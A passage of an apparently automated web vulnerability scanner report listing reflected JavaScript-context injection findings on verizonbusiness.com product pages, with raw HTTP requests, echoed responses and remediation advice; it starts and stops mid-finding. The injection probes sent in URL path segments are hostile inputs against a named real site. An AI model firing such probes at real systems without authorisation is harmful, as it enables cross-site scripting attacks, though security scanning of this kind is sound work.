<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking8085a";9a4165e21d9/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.247. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d14b0"%3b44351732e11 was submitted in the REST URL parameter 3. This input was echoed as d14b0";44351732e11 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/managedd14b0"%3b44351732e11/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:46:06 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking/managedd14b0";44351732e11/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.248. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1058a'%3bd98a0c15b3a was submitted in the REST URL parameter 3. This input was echoed as 1058a';d98a0c15b3a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/managed1058a'%3bd98a0c15b3a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking/managed1058a';d98a0c15b3a/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.249. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/point-to-point/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe4b1"%3bbdcf35b5e0f was submitted in the REST URL parameter 1. This input was echoed as fe4b1";bdcf35b5e0f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsfe4b1"%3bbdcf35b5e0f/networking/point-to-point/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:24 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsfe4b1";bdcf35b5e0f/networking/point-to-point/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIM
...[SNIP]...

1.250. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/point-to-point/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab839'%3b47228117105 was submitted in the REST URL parameter 1. This input was echoed as ab839';47228117105 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsab839'%3b47228117105/networking/point-to-point/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productsab839';47228117105/networking/point-to-point/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.251. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/point-to-point/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4caf5'%3b66c3ac51b69 was submitted in the REST URL parameter 2. This input was echoed as 4caf5';66c3ac51b69 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking4caf5'%3b66c3ac51b69/point-to-point/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42333
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking4caf5';66c3ac51b69/point-to-point/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.252. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/point-to-point/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8f3f"%3b94dfddd759e was submitted in the REST URL parameter 2. This input was echoed as f8f3f";94dfddd759e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingf8f3f"%3b94dfddd759e/point-to-point/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:45:48 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42333
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networkingf8f3f";94dfddd759e/point-to-point/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.253. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/point-to-point/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a105"%3b3c469b02d03 was submitted in the REST URL parameter 3. This input was echoed as 2a105";3c469b02d03 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/point-to-point2a105"%3b3c469b02d03/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43224
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
bx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking/point-to-point2a105";3c469b02d03/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.254. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/point-to-point/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41353'%3bea99ac7d785 was submitted in the REST URL parameter 3. This input was echoed as 41353';ea99ac7d785 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/point-to-point41353'%3bea99ac7d785/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43224
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking/point-to-point41353';ea99ac7d785/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.255. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/private/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4683"%3bd3f1738ab2e was submitted in the REST URL parameter 1. This input was echoed as d4683";d3f1738ab2e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsd4683"%3bd3f1738ab2e/networking/private/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:28 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsd4683";d3f1738ab2e/networking/private/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.256. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/private/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66573'%3b550baaaab48 was submitted in the REST URL parameter 1. This input was echoed as 66573';550baaaab48 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products66573'%3b550baaaab48/networking/private/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:35 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products66573';550baaaab48/networking/private/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.257. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/private/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff012'%3bc2dc23e2a19 was submitted in the REST URL parameter 2. This input was echoed as ff012';c2dc23e2a19 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingff012'%3bc2dc23e2a19/private/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:46 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/networkingff012';c2dc23e2a19/private/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.258. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/private/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 318cd"%3bfc1a5f74697 was submitted in the REST URL parameter 2. This input was echoed as 318cd";fc1a5f74697 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking318cd"%3bfc1a5f74697/private/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:40 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking318cd";fc1a5f74697/private/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.259. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/private/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5eaed'%3b470ed5b6194 was submitted in the REST URL parameter 3. This input was echoed as 5eaed';470ed5b6194 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/private5eaed'%3b470ed5b6194/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

